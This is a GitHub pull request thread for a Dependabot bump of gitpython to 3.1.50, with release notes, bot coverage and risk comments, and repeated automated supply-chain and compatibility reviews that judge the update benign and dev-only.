build(deps): bump gitpython from 3.1.47 to 3.1.50

[dependabot]

Bumps gitpython from 3.1.47 to 3.1.50.

Release notes

Sourced from gitpython's releases.

3.1.50

What's Changed

• Bump https://github.com/astral-sh/ruff-pre-commit from v0.15.8 to 0.15.12 in the pre-commit group by @​dependabot[bot] in gitpython-developers/GitPython#2140
• Bump git/ext/gitdb from 335c0f6 to 53c94d6 by @​dependabot[bot] in gitpython-developers/GitPython#2141
• Fix Repo() autodiscovery in linked worktrees when GIT_DIR is set by @​meliezer in gitpython-developers/GitPython#2128
• Validate config key names before writing by @​Byron in gitpython-developers/GitPython#2142

New Contributors

• @​meliezer made their first contribution in gitpython-developers/GitPython#2128

Full Changelog: gitpython-developers/GitPython@3.1.49...3.1.50

3.1.49 - Security

What's Changed

• reject control chars in written values in configuration by @​Byron in gitpython-developers/GitPython#2137
• Improve pure Python rev-parse coverage and behavior by @​Copilot in gitpython-developers/GitPython#2136

Full Changelog: gitpython-developers/GitPython@3.1.48...3.1.49

3.1.48 - Security

Accidentally deleted the previous GH release, it did mention the advisory this fixes.

What's Changed

• prevent out-of-repo access when manipulating references. by @​Byron in gitpython-developers/GitPython#2134

Full Changelog: gitpython-developers/GitPython@3.1.47...3.1.48

Commits

• 5a294a6 bump version to 3.1.50
• d7b029f Merge pull request #2142 from gitpython-developers/fix-validate-config-key-ne...
• 5453842 Validate config key section names before writing
• 1085a7c Merge pull request #2128 from meliezer/fix-worktree-git-dir
• b7f5fde Merge pull request #2141 from gitpython-developers/dependabot/submodules/git/...
• 4e8cd45 Bump git/ext/gitdb from 335c0f6 to 53c94d6
• 9e94459 Merge pull request #2140 from gitpython-developers/dependabot/pre_commit/pre-...
• 714e2e1 Xfail Windows symlink-capable index mutation test
• b17f113 Bump https://github.com/astral-sh/ruff-pre-commit
• aee2fd5 bump version to 3.1.49
• Additional commits viewable in compare view

---

Note

Low Risk
Low risk dependency-only change confined to poetry.lock, though it may subtly affect any dev tooling that uses gitpython.

Overview
Updates the locked gitpython dependency from 3.1.47 to 3.1.50 in poetry.lock, including the associated artifact hashes.

^{Reviewed by Cursor Bugbot for commit 872ede9. Bugbot is set up for automated code reviews on this repo. Configure here.}

[socket-security]

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff	Package	Supply Chain Security	Vulnerability	Quality	Maintenance	License
	pypi/​gitpython@​3.1.47 ⏵ 3.1.50		+31

View full report

[cursor]

Cursor Bugbot has reviewed your changes and found 1 potential issue.

^{❌ Bugbot Autofix is OFF. To automatically fix reported issues with cloud agents, enable autofix in the Cursor dashboard.}

^{Reviewed by Cursor Bugbot for commit 843f2e3b66838d7391f119596fedadf4c263000b. Configure here.}

[github-actions]

🤖 Cursor Dependency Analysis

Supply-Chain Malware Review

Verdict: benign

Why this looks safe

• Upstream identity: The dependency is the real GitPython project; the bump stays on 3.1.x with public releases and linked PRs (reference hardening, config write validation, rev-parse behavior). That matches normal security maintenance, not a hijack pattern.

• Code vs. claimed fixes: The malware scan’s changed-file list (git/config.py, git/refs/*.py, git/repo/*.py, tests) aligns with config / refs / repo hardening—not random new surfaces like crypto miners or exfil.

• Scanner evidence:

  • Unicode / confusable / IOC: all zero after allowlisting — no GlassWorm-style invisible characters or obvious IOCs.
  • shell_process_spawn hits on subprocess in git/util.py and tests are expected for a library that shells out to git; they are not, by themselves, compromise indicators.
  • maintainer_drift on gitpython:0 matching 3.1.47->3.1.50 is almost certainly a false positive from a generic heuristic (your report even ties it to an “npm-maintainers” pattern), not evidence that the PyPI publisher changed.

• Checklist items: No reported base64/eval exfil pipelines, startup persistence, typosquat, npm lifecycle scripts, or suspicious CI-only churn in what you summarized; lockfile entries for 3.1.50 with normal wheel/sdist hashes are consistent with a routine Poetry refresh.

Residual risk (normal, not “malicious”): Like any release, bugs could exist; CI should still pass. For merge confidence, rely on green tests and that poetry.lock only moves GitPython (and any declared transitive pins) as intended—but nothing here suggests supply-chain compromise.

Compatibility Analysis

Searching the codebase for GitPython usage and checking how it's declared as a dependency.

1) Where it appears

• Declared: gitpython is pinned in poetry.lock (currently listed as 3.1.50 in this checkout). It is not named in pyproject.toml as a top-level dependency in the grep I ran.
• Who pulls it in: tach (dev marker / extra == "dev") declares gitpython = ">=3.1,<4.0":

[package.dependencies]
gitpython = ">=3.1,<4.0"
networkx = ">=2.6,<4.0"

• First-party code: Under chia/, tools/, and chia/_tests/ there are no import git / from git... hits. The only git imports in the tree are under .upstream-dependency/ (bundled upstream GitPython sources for review), not application code.

2) Overlap with changed behavior (3.1.47 → 3.1.50)

Upstream changes called out in the PR are security hardening: safer reference handling, stricter config writes (control characters / section-name validation), worktree git_dir fix, pure-Python rev-parse tweaks, and a gitdb bump inside GitPython.

Chia has no direct GitPython usage to intersect those APIs. The only runtime consumer in this dependency graph is tach (dev tooling), which typically opens the repo and inspects history—not the same surface as “write arbitrary git config with control chars” or “pathological ref escape,” but we did not inspect tach’s source in this environment.

3) Risks / unknowns

• Low: Patch release within the same major; changes are mostly restrictive (reject unsafe inputs) plus bug fixes—unlikely to break normal CI/dev usage.
• Residual: Any indirect reliance on previously allowed unsafe ref/config paths could now raise or fail; that would show up as tach (or another transitive caller) errors in dev/CI, not in node/wallet runtime.
• Non-code: maintainer_drift in your malware scan is a supply-chain heuristic, not evidence of compromise.

4) Recommendation

Merge (optionally merge with caveats: watch dev CI for tach if you run it in pipelines; main product code does not consume GitPython directly). Do not hold for API compatibility based on this repo’s usage—the bump is aligned with security advisories and Chia’s tree does not import git.

---

Malware Scan Summary

• Status: warn
• Warn only mode: true
• Changed upstream files scanned: 15
• Resolution strategy: tag_range
• Changed node/vendor paths: 0
• Changed lockfiles: 0
• Resolved upstream range: 4199cb89755f705801a4cb241723325b46201f51..5a294a6fc7ed5dc0946d4b576257bf926178f269
• Resolved refs: from=4199cb89755f705801a4cb241723325b46201f51 to=5a294a6fc7ed5dc0946d4b576257bf926178f269
• Unicode findings (post-allowlist): 0
• Confusable findings (post-allowlist): 0
• IOC findings (post-allowlist): 0
• Heuristic findings (post-allowlist): 9

Top findings

• test/test_index.py:16 shell_process_spawn :: import subprocess
• test/test_index.py:85 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
• test/test_index.py:92 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
• test/test_index.py:125 shell_process_spawn :: process = subprocess.run(command, capture_output=True)
• git/util.py:44 shell_process_spawn :: import subprocess
• git/util.py:356 shell_process_spawn :: executable search on a native Windows system due to a :class:subprocess.Popen
• git/util.py:473 shell_process_spawn :: process = subprocess.Popen([uname_cmd], stdout=subprocess.PIPE, universal_newlines=True)
• git/util.py:508 shell_process_spawn :: def finalize_process(proc: Union[subprocess.Popen, "Git.AutoInterrupt"], **kwargs: Any) -> None:
• gitpython:0 maintainer_drift :: 3.1.47->3.1.50

[coveralls-official]

Coverage Report for CI Build 26295484600

Warning

Build has drifted: This PR's base is out of sync with its target branch, so coverage data may include unrelated changes.
Quick fix: rebase this PR. Learn more →

Warning

No base build found for commit c9b6c92 on main.
Coverage changes can't be calculated without a base build.
If a base build is processing, this comment will update automatically when it completes.

Coverage: 91.498%

Details

• Patch coverage: No coverable lines changed in this PR.

Uncovered Changes

No uncovered changes found.

Coverage Regressions

Requires a base build to compare against. How to fix this →

---

Coverage Stats

Relevant Lines:	122097
Covered Lines:	111893
Line Coverage:	91.64%
Relevant Branches:	12036
Covered Branches:	10836
Branch Coverage:	90.03%
Branches in Coverage %:	Yes
Coverage Strength:	1.83 hits per line

---

💛 - Coveralls

[emlowe]

@dependabot recreate

[github-actions]

🤖 Cursor Dependency Analysis

Supply-Chain Malware Review

Verdict: benign

Evidence

• Upstream delta matches public releases — The scanned range lands on tagged GitPython 3.1.50; changed paths (git/config.py, git/refs/*.py, git/repo/*.py, git/util.py, matching tests, VERSION, changelog) are consistent with documented security hardening (reference handling, config writes) and routine fixes (worktrees, config key validation), not unrelated payloads.

• Scanner corroborates low risk — Post-allowlist: 0 unicode/confusable/IOC hits. “shell_process_spawn” on subprocess in git/util.py and tests is expected for a library that shells out to git; it is not evidence of compromise.

• Interpretation vs. scanner — The maintainer_drift / npm-maintainers hit on gitpython is almost certainly a false positive: GitPython is a PyPI package; an npm-oriented maintainer heuristic should not be treated as publisher drift for this bump.

• Checklist items with nothing actionable — No reported obfuscation, exfiltration URLs, persistence writes, typosquatting (same canonical project), or npm lifecycle/script concerns; dependency integrity matches a small patch jump with published notes and compare links.

Residual note: Merge after normal CI; treat this bump as desirable given labeled security releases in the span you’re adopting.

Compatibility Analysis

Searching the codebase for GitPython usage and reviewing upstream changes relevant to those call sites.

1) Where gitpython shows up

• Not declared in pyproject.toml as a direct dependency.
• poetry.lock: only tach declares gitpython = ">=3.1,<4.0" (around line 3808). tach is an optional dev tool (extra == "dev" in the lock metadata).
• chia/: no import git / from git. — GitPython is not used by application code in this tree.
• .upstream-dependency/ is vendored GitPython source for review only, not runtime usage.

So usage is indirect: dev installs that pull tach get GitPython.

---

2) Overlap with 3.1.47 → 3.1.50 changes

Upstream highlights:

Area	Versions
Reference handling / path safety	3.1.48
Config writes (control chars, key validation)	3.1.49–3.1.50
Pure-Python rev-parse behavior	3.1.49
Repo() discovery with GIT_DIR + linked worktrees	3.1.50
Bundled gitdb submodule bump (upstream repo); PyPI still pins gitdb via metadata	3.1.50

Tach almost certainly uses git.Repo / repo introspection on your tree. That does touch Repo() discovery and possibly refs/config paths at the margins, but these releases are fixes and hardening, not advertised API removals.

First-party Chia code: no intersection — nothing to break at source level.

---

3) Risks / unknowns

• CI / dev-only: Impact is confined to environments where tach runs (e.g. modular-architecture checks). Production installs without dev may never install GitPython depending on how dependencies are resolved — still safe to treat this as low blast radius.
• Stricter validation: Code that relied on writing odd config keys/values could now raise where it previously appeared to work — unlikely for normal tach usage on this repo.
• Rev-parse tweaks: Possible subtle behavior change for unusual refs/paths; low probability for typical monorepo CI.

---

4) Recommendation

Merge — Strong upside (security fixes on refs/config handling), no direct usage in chia/, dependency only via tach under dev.

Sanity check after merge: run whatever CI/job invokes tach (if any) once on the PR branch to confirm no tooling regression.

---

Malware Scan Summary

• Status: warn
• Warn only mode: true
• Changed upstream files scanned: 15
• Resolution strategy: tag_range
• Changed node/vendor paths: 0
• Changed lockfiles: 0
• Resolved upstream range: 4199cb89755f705801a4cb241723325b46201f51..5a294a6fc7ed5dc0946d4b576257bf926178f269
• Resolved refs: from=4199cb89755f705801a4cb241723325b46201f51 to=5a294a6fc7ed5dc0946d4b576257bf926178f269
• Unicode findings (post-allowlist): 0
• Confusable findings (post-allowlist): 0
• IOC findings (post-allowlist): 0
• Heuristic findings (post-allowlist): 9

Top findings

• test/test_index.py:16 shell_process_spawn :: import subprocess
• test/test_index.py:86 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
• test/test_index.py:93 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
• test/test_index.py:126 shell_process_spawn :: process = subprocess.run(command, capture_output=True)
• git/util.py:44 shell_process_spawn :: import subprocess
• git/util.py:356 shell_process_spawn :: executable search on a native Windows system due to a :class:subprocess.Popen
• git/util.py:473 shell_process_spawn :: process = subprocess.Popen([uname_cmd], stdout=subprocess.PIPE, universal_newlines=True)
• git/util.py:508 shell_process_spawn :: def finalize_process(proc: Union[subprocess.Popen, "Git.AutoInterrupt"], **kwargs: Any) -> None:
• gitpython:0 maintainer_drift :: 3.1.47->3.1.50

[emlowe]

@dependabot recreate

[github-actions]

🤖 Cursor Dependency Analysis

Supply-Chain Malware Review

Reviewing how gitpython is declared and used in this repo, and what the dependency update changes.
Verdict: benign

Supply-chain malware review

• PR scope: Lockfile-only bump in poetry.lock (gitpython 3.1.47 → 3.1.50, with matching sha256 hashes for wheel/sdist). No repo application code, workflows, or install scripts changed.
• Scanner evidence (hard): unicode, confusable, and ioc = 0. Status warn is from heuristics only, not confirmed malware signals.
• Heuristic disagreements:
  • shell_process_spawn (8 hits): Expected for GitPython (wraps the git CLI via subprocess). Upstream git/util.py change in this range is a one-line type annotation fix, not new process-spawning logic.
  • maintainer_drift (3.1.47->3.1.50): False positive — normal semver patch bump on the official gitpython-developers/GitPython repo, not npm maintainer takeover.
• Upstream diff (15 files, tag range 4199cb8..5a294a6): Security-hardening changes — path validation for refs (_get_validated_path), config write validation (reject CR/LF/NUL), worktree GIT_DIR fix, gitdb submodule bump. No obfuscation, eval/exec, exfil URLs, persistence writes, or suspicious lifecycle hooks.
• Integrity: Sequential tagged releases (3.1.48/3.1.49 marked security); no ghost version or unexpected new top-level packages. gitdb/smmap remain existing transitives.
• Chia exposure: gitpython is not imported under chia/; it is a dev transitive of tach (pyproject.toml dev extra). Runtime attack surface for the node is minimal; the update mainly pulls in upstream CVE fixes.

Recommendation: Approve from a malware/supply-chain perspective. The scanner warn should not block merge; treat it as noise unless you want to tune heuristics for Git libraries. Merge is still worthwhile for the documented security fixes in 3.1.48–3.1.50.

Compatibility Analysis

Analyzing GitPython usage in the repo and comparing it with upstream changes in 3.1.48–3.1.50.

Compatibility & adoption analysis — GitPython 3.1.47 → 3.1.50

1) Where it appears in this repo

No direct usage. There are no import git / from git import … calls under chia/ or project scripts.

Transitive dev-only dependency:

Chain	Role
pyproject.toml → dev extra → tach	Module-boundary linter
tach → gitpython (via poetry.lock)	Git integration inside tach

How chia actually invokes it:

• Primary: .pre-commit-config.yaml runs ./activated.py tach check (also in .github/workflows/pre-commit.yml).
• Secondary (if used): tach test, tach export/upload, and the tach pytest plugin (--tach* flags).

GitPython is gated behind extra == "dev" in the lockfile — not part of production/runtime installs.

---

2) Intersection with changed APIs (3.1.48–3.1.50)

Upstream changes are security/hardening, not breaking API removals:

Release change	Tach touchpoint	Overlap with chia usage
3.1.48 — block out-of-repo reference paths	None (tach does not create/delete refs)	None
3.1.49 — reject control chars in config writes; rev-parse improvements	config_reader().get_value(...) (read-only); repo.git.rev_parse("--show-toplevel") in get_changed_files	Only via optional tach paths; reads only
3.1.50 — validate config key/section names on write; linked-worktree Repo() autodiscovery	Repo(project_root, search_parent_directories=True) in git_ops.py	Helps CI/worktree setups; no write paths

Important: tach check (the pre-commit hook) uses the Rust extension.check() path and does not import GitPython. GitPython is loaded only by:

• tach/filesystem/git_ops.py → get_changed_files, get_current_branch_info
• Used by tach modularity, tach test, and the pytest plugin

Those code paths are read-only: open repo, git diff, git ls-files, rev-parse, read config/branch metadata.

---

3) Risks / unknowns

Risk	Severity	Notes
Runtime/production impact	None	Dev-extra only; not shipped with chia node/wallet
tach check regression	Very low	Does not call GitPython
Pytest plugin / tach test	Low	Uses GitPython for diff discovery; security fixes are tightening, not loosening behavior
rev-parse behavior change	Low	Could affect edge-case repo layouts; normal GitHub checkouts should be fine
Lockfile metadata shift (gitpython/gitdb/smmap marked non-optional in main group)	Cosmetic	Poetry/uv resolution artifact; still optional = true + extra == "dev" marker
Malware scan “maintainer_drift”	Informational	No IOCs; expected for version bumps on PyPI packages
gitdb submodule bump inside GitPython	Low	Internal to GitPython; no direct chia usage

Unknown: No chia CI job appears to run tach test or pytest with --tach; those paths are unverified in CI but are optional developer workflows.

---

4) Recommendation: merge

This is a security-motivated patch bump (3.1.48–3.1.50) on a dev-only transitive dependency with no direct chia code coupling. The main pre-commit surface (tach check) does not exercise the changed GitPython APIs.

Merge rationale: picks up reference/config hardening with negligible compatibility risk; staying on 3.1.47 leaves known security fixes unapplied for dev tooling.

Post-merge sanity check: confirm pre-commit CI passes (already the natural gate for this bump). No additional targeted testing required unless you routinely use pytest --tach or tach test.

---

Malware Scan Summary

• Status: warn
• Warn only mode: true
• Changed upstream files scanned: 15
• Resolution strategy: tag_range
• Changed node/vendor paths: 0
• Changed lockfiles: 0
• Resolved upstream range: 4199cb89755f705801a4cb241723325b46201f51..5a294a6fc7ed5dc0946d4b576257bf926178f269
• Resolved refs: from=4199cb89755f705801a4cb241723325b46201f51 to=5a294a6fc7ed5dc0946d4b576257bf926178f269
• Unicode findings (post-allowlist): 0
• Confusable findings (post-allowlist): 0
• IOC findings (post-allowlist): 0
• Heuristic findings (post-allowlist): 9

Top findings

• test/test_index.py:16 shell_process_spawn :: import subprocess
• test/test_index.py:86 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
• test/test_index.py:93 shell_process_spawn :: process: "subprocess.CompletedProcess[bytes]"
• test/test_index.py:126 shell_process_spawn :: process = subprocess.run(command, capture_output=True)
• git/util.py:44 shell_process_spawn :: import subprocess
• git/util.py:356 shell_process_spawn :: executable search on a native Windows system due to a :class:subprocess.Popen
• git/util.py:473 shell_process_spawn :: process = subprocess.Popen([uname_cmd], stdout=subprocess.PIPE, universal_newlines=True)
• git/util.py:508 shell_process_spawn :: def finalize_process(proc: Union[subprocess.Popen, "Git.AutoInterrupt"], **kwargs: Any) -> None:
• gitpython:0 maintainer_drift :: 3.1.47->3.1.50